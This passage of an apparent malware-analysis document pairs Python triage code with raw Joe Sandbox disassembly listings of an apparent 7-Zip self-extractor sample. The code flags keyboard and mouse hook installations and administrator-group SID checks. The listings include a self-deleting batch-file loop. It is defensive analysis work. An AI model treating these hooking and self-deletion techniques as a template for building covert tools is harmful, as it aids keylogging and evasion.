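WH_TYPES = {-1: "WH_MSGFILTER", 0: "WH_JOURNALRECORD", 1: "WH_JOURNALPLAYBACK",
            2: "WH_KEYBOARD", 3: "WH_GETMESSAGE", 4: "WH_CALLWNDPROC", 5: "WH_CBT",
            6: "WH_SYSMSGFILTER", 7: "WH_MOUSE", 8: "WH_HARDWARE", 9: "WH_DEBUG",
            10: "WH_SHELL", 11: "WH_FOREGROUNDIDLE", 12: "WH_CALLWNDPROCRET",
            13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}
LOW_LEVEL_HOOKS = {13, 14}
WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators",
                   "S-1-5-32-545": "BUILTIN\\Users"}

def parse_arg(tok: str) -> Union[int, str]:
    """8-digit hex (optionally negative) -> int; '?' (unresolved by the
    sandbox), Function_xxxx labels and string literals stay as text."""
    tok = tok.strip()
    if HEX_RE.match(tok):
        val = int(tok.lstrip("-"), 16)
        return -val if tok.startswith("-") else val
    return tok

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if m:
            raw = m.group("args")
            args = [parse_arg(a) for a in raw.split(",")] if raw else []
            calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                 int(m.group("ref"), 16)))
    return calls

def is_low_level_hook(idhook: int) -> bool:
    return idhook in LOW_LEVEL_HOOKS

def sid_from_alloc_call(call: ApiCall, authority: int = 5) -> str:
    """Rebuild the SID from AllocateAndInitializeSid(pAuth, n, sub0, ...).
    Only a pointer is shown for pAuth, so the authority value is an
    assumption (5 = SECURITY_NT_AUTHORITY, which 32-544 belongs to)."""
    count = call.args[1]
    subs = call.args[2:2 + count] if isinstance(count, int) else []
    if not subs or not all(isinstance(s, int) for s in subs):
        raise ValueError("sub-authorities not resolved in the listing")
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))

def triage(text: str) -> List[str]:
    """One finding per hook installation and per SID construction."""
    calls = parse_api_lines(text)
    out = []
    for i, c in enumerate(calls):
        if c.name.startswith("SetWindowsHookEx") and c.args and isinstance(c.args[0], int):
            idhook = c.args[0]
            if is_low_level_hook(idhook):
                scope = "global: low-level hooks are always system-wide"
            elif i and calls[i - 1].name == "GetCurrentThreadId":
                # Inference, not stated by the listing: dwThreadId prints as
                # 00000000 because it is a run-time value from GetCurrentThreadId.
                scope = "likely thread-scoped: dwThreadId from GetCurrentThreadId"
            else:
                scope = "scope unresolved: dwThreadId is dynamic in the listing"
            out.append("%08X SetWindowsHookEx idHook=%d %s; %s" % (
                c.ref, idhook, WH_TYPES.get(idhook, "WH_UNKNOWN"), scope))
        elif c.name == "AllocateAndInitializeSid":
            sid = sid_from_alloc_call(c)
            nxt = calls[i + 1].name if i + 1 < len(calls) else ""
            tail = "; then CheckTokenMembership: admin-group check" if nxt == "CheckTokenMembership" else ""
            out.append("%08X AllocateAndInitializeSid builds %s (%s)%s" % (
                c.ref, sid, WELL_KNOWN_SIDS.get(sid, "not a well-known alias"), tail))
    return out
```

Running `triage(REPORT_LINES)` reports both hooks as WH_MOUSE / WH_KEYBOARD and likely thread-scoped, and the SID as S-1-5-32-544 (BUILTIN\Administrators) followed by CheckTokenMembership. The practical point is the contrast with a WH_KEYBOARD_LL (13) installation, which the same code would flag as global regardless of the thread-id argument; the report's "low level keyboard hook" signature is not confirmed by these two particular calls and should be checked against the other SetWindowsHookExW sites in the binary.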
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                    • Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
                                                                    • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                    • Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
APIs
• GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
• ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
• GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
• CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
• AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
• CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
• SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
• ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
• GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
• ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
• GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
Similarity
• API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
• String ID: " -$sfxwaitall
• API String ID: 2734624574-3991362806
APIs
• GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
• WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
• CloseHandle.KERNEL32(00419858), ref: 00405445
• SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
• ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
• ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
Similarity
• API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
• String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
• API String ID: 3007203151-3467708659
APIs
• GetClassNameA.USER32(?,?,00000040), ref: 00403140
• lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
• GetWindowLongW.USER32(?,000000F0), ref: 00403160
  • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
  • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
• GetParent.USER32(?), ref: 0040319B
• LoadLibraryA.KERNEL32(riched20), ref: 004031AF
• GetMenu.USER32(?), ref: 004031C2
• SetThreadLocale.KERNEL32(00000419), ref: 004031CF
• CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
• DestroyWindow.USER32(?), ref: 00403210
• SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
• GetSysColor.USER32(0000000F), ref: 00403229
• SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
• SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
Similarity
• API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
• String ID: RichEdit20W$STATIC$riched20${\rtf
• API String ID: 3514532227-2281146334
APIs
• GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
• LoadIconW.USER32(00000000), ref: 00408717
• GetSystemMetrics.USER32(00000032), ref: 0040872B
• GetSystemMetrics.USER32(00000031), ref: 00408730
• GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
• LoadImageW.USER32(00000000), ref: 0040873C
• SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
• GetDlgItem.USER32(?,000004B2), ref: 00408781
• GetDlgItem.USER32(?,000004B2), ref: 0040878B
• GetWindowLongW.USER32(?,000000F0), ref: 00408797
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
• GetDlgItem.USER32(?,000004B5), ref: 004087B4
• GetDlgItem.USER32(?,000004B5), ref: 004087C2
• GetWindowLongW.USER32(?,000000F0), ref: 004087CE
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
• GetWindow.USER32(?,00000005), ref: 004088C3
• GetWindow.USER32(?,00000005), ref: 004088DF
• GetWindow.USER32(?,00000005), ref: 004088F7
• GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
• LoadIconW.USER32(00000000), ref: 0040895E
• GetDlgItem.USER32(?,000004B1), ref: 0040897D
• SendMessageW.USER32(00000000), ref: 00408980
  • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
  • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
  • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
  • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
Similarity
• API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
• String ID:
• API String ID: 3694754696-0
APIs
• lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
  • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
  • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
  • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
  • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
  • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
  • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
  • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
  • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00928E78,00404926), ref: 0040224B
  • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00928E78), ref: 0040225B
  • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
  • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
  • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
  • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
• _wtol.MSVCRT ref: 00404CDF
• _wtol.MSVCRT ref: 00404CFB
Similarity
• API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
• String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
• API String ID: 2725485552-1675048025
                                                                    • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                    • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                                    • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                    • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                                    APIs
                                                                    • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                    • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                    • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                    • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                    • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                    • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                    • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                    • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                                    • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                    • String ID:
                                                                    • API String ID: 3462224810-0
                                                                    • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                    • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                                    • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                    • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                                    APIs
                                                                    • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                                    • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                                    • GetMenu.USER32(?), ref: 0040202E
                                                                      • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                      • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                      • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                      • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                      • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                      • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                                    • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                                    • CoInitialize.OLE32(00000000), ref: 00402076
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                                      • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                      • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                      • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                      • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                      • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                      • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                      • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                      • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                      • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                      • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                      • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                      • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                                    • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                                    • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                    • String ID: IMAGES$STATIC
                                                                    • API String ID: 4202116410-1168396491
                                                                    • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                    • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                                    • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                    • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                                    APIs
                                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                    • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                                    • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                                    • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                                    • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                                    • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                                    • SetFocus.USER32(00000000), ref: 00408C16
                                                                    • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                                    • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                                    • IsWindow.USER32(00000000), ref: 00408C89
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00408C99
                                                                    • EnableWindow.USER32(00000000), ref: 00408C9C
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                                    • ShowWindow.USER32(00000000), ref: 00408CB3
                                                                      • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                      • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                      • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                    • String ID:
                                                                    • API String ID: 1057135554-0
                                                                    • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                    • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                                    • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                    • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                                    • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
                                                                    • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                                    • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                                    • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004073F4
                                                                    • GetParent.USER32(?), ref: 00407418
                                                                    • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                                    • ClientToScreen.USER32(?,?), ref: 0040743D
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                                    • GetClientRect.USER32(?,?), ref: 0040753D
                                                                      • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                                      • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
                                                                    • ClientToScreen.USER32(?,?), ref: 00407446
                                                                      • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                    • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
